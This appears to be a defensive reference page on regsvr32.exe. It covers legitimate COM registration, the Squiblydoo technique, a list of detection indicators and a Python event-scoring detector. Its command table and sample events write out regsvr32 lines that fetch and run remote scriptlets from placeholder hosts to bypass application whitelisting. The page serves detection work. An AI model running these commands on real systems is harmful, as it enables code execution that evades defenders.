Process
regsvr32.exe
regsvr32.exe is the Windows utility for registering and unregistering COM components, the DLLs and ActiveX controls (.ocx) that programs share through the registry. Software installers use it to wire up their COM objects. Attackers use the same mechanism to download and run scriptlets through a trusted, signed binary.
File identity
Not observed.
Execution context
Not observed.
Ancestry
Not observed.
Behavior
Not observed.
Command | Category · Description
regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll | AWL Bypass · Execute code from remote scriptlet, bypass application whitelisting
regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll | AWL Bypass · Execute code from scriptlet, bypass application whitelisting
regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll | Execute · Execute code from remote scriptlet, bypass application whitelisting
regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll | Execute · Execute code from scriptlet, bypass application whitelisting
regsvr32.exe /s {PATH:.dll} | Execute · Execute DLL file
regsvr32.exe /u /s {PATH:.dll} | Execute · Execute DLL file
Indicators
Not observed.
Analysis
regsvr32.exe registers a COM server by loading the DLL and calling its exported DllRegisterServer function, which writes the component's registry entries. /u unregisters by calling DllUnregisterServer, and /s runs silently without the usual dialog. The genuine binary lives at C:\Windows\System32\regsvr32.exe, with a 32-bit copy under SysWOW64. Legitimately it appears during software installs and updates, almost always parented by an installer.
It has a second registration path through /i, which calls the DLL's DllInstall function and can pass it a string argument. Paired with the system's COM scriptlet DLL (scrobj.dll), that argument can even be a URL pointing at a script component. Like rundll32.exe, regsvr32 only ever does what its command line names: the DLL on the line and the function it exports.
Outside of software installation, regsvr32 runs rarely and briefly. Its parent and command line are what give each instance meaning.
regsvr32.exe is a classic proxy-execution tool (T1218.010), best known for the Squiblydoo technique. A command line like regsvr32 /s /n /u /i:https://host/file.sct scrobj.dll makes the signed binary download a remote COM scriptlet and run the JScript or VBScript inside it through DllInstall, with no admin rights and nothing written to disk (T1059.007). The /i: URL paired with scrobj.dll is the signature, and the remote fetch shows up as network activity from a process that normally makes none (T1105).
Even without scriptlets, regsvr32 will load and execute any DLL it is pointed at, calling that DLL's DllRegisterServer or DllInstall. A malicious DLL registered this way runs its code under a trusted, Microsoft-signed process, so path and signature checks pass. The tell is a DLL loaded from a user-writable directory or a parent that has no reason to be installing software.
- Image path other than C:\Windows\System32\regsvr32.exe or its SysWOW64 copy · high
- A URL (http/https) on the command line, especially with /i: · high
- scrobj.dll referenced on the command line · high
- Loading a DLL from a user-writable path (Temp, AppData, Downloads) · high
- Parent is an Office application, wscript.exe, cscript.exe, mshta.exe, cmd.exe, or powershell.exe · high
- Outbound network connections from regsvr32 · high
- Silent (/s) registration of a DLL with no surrounding installer activity · med
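The indicator list above and the Analysis section describe what to check on each regsvr32 process event: image path, command line (URL, /i:, scrobj.dll, user-writable DLL path), parent, and network activity. The following is an added example, not code from this page, that turns those indicators into a scoring function over a process event. The ProcessEvent shape, the parent-name sets, the installer-parent heuristic and the sample events are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed event shape: the fields a process-creation event plus a network
# flag would give a detection pipeline. Field names are this example's own.
@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    network_connection: bool = False

# Genuine locations named in the Analysis section.
GENUINE_IMAGES = {
    r"c:\windows\system32\regsvr32.exe",
    r"c:\windows\syswow64\regsvr32.exe",
}
# Parents from the indicator list; the Office names are this example's choice.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe",
}
# Assumption: "surrounding installer activity" is approximated by the parent
# process name looking like an installer. Real pipelines would use more context.
INSTALLER_PARENT = re.compile(r"(msiexec\.exe|setup|install|updat)", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads)\\", re.I)
URL = re.compile(r"https?://", re.I)


def tokenize(command_line):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def analyze(ev):
    """Return the (indicator, severity) pairs that fire for one regsvr32 event."""
    findings = []
    tokens = tokenize(ev.command_line)
    switches = [t for t in tokens[1:] if t.startswith("/")]
    operands = [t for t in tokens[1:] if not t.startswith("/")]  # the DLL argument
    install_args = [s[3:] for s in switches if s.lower().startswith("/i:")]

    if ev.image.lower() not in GENUINE_IMAGES:
        findings.append(("image path outside System32/SysWOW64", "high"))
    if any(URL.search(a) for a in install_args):
        findings.append(("URL passed via /i:", "high"))
    elif URL.search(ev.command_line):
        findings.append(("URL on the command line", "high"))
    if any(t.lower().endswith("scrobj.dll") for t in operands):
        findings.append(("scrobj.dll referenced on the command line", "high"))
    if any(USER_WRITABLE.search(p) for p in operands + install_args):
        findings.append(("DLL or scriptlet loaded from user-writable path", "high"))
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        findings.append((f"parent {parent} has no reason to register COM", "high"))
    if ev.network_connection:
        findings.append(("outbound network connection from regsvr32", "high"))
    silent = any(s.lower() == "/s" for s in switches)
    if silent and not INSTALLER_PARENT.search(parent):
        findings.append(("silent /s registration without installer context", "med"))
    return findings


def verdict(ev):
    """Collapse findings to the highest severity: 'high', 'med' or 'none'."""
    severities = {s for _, s in analyze(ev)}
    return "high" if "high" in severities else "med" if "med" in severities else "none"


# Constructed sample events (hostnames and paths are placeholders).
SQUIBLYDOO = ProcessEvent(
    r"C:\Windows\System32\regsvr32.exe",
    "regsvr32 /s /n /u /i:https://example.invalid/file.sct scrobj.dll",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    network_connection=True,
)
INSTALLER = ProcessEvent(
    r"C:\Windows\System32\regsvr32.exe",
    'regsvr32.exe /s "C:\\Program Files\\Vendor\\component.dll"',
    r"C:\Program Files\Vendor\setup.exe",
)
TEMP_DLL = ProcessEvent(
    r"C:\Windows\System32\regsvr32.exe",
    r"regsvr32.exe /s C:\Users\bob\AppData\Local\Temp\loader.dll",
    r"C:\Windows\System32\cmd.exe",
)
SILENT_ONLY = ProcessEvent(
    r"C:\Windows\System32\regsvr32.exe",
    r"regsvr32.exe /s C:\Windows\System32\example.dll",
    r"C:\Windows\explorer.exe",
)

if __name__ == "__main__":
    for name, ev in [("squiblydoo", SQUIBLYDOO), ("installer", INSTALLER),
                     ("temp_dll", TEMP_DLL), ("silent_only", SILENT_ONLY)]:
        print(name, verdict(ev), analyze(ev))
```

The DLL argument is taken as the positional token on the command line, which is how the page describes regsvr32 behaving: it only ever loads the DLL named there. Only forward-slash switches are parsed, matching the forms in the Behavior table; the installer-context check is the one deliberately soft heuristic, since the page defines that indicator by surrounding activity rather than by any single field.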
Telemetry
Not observed.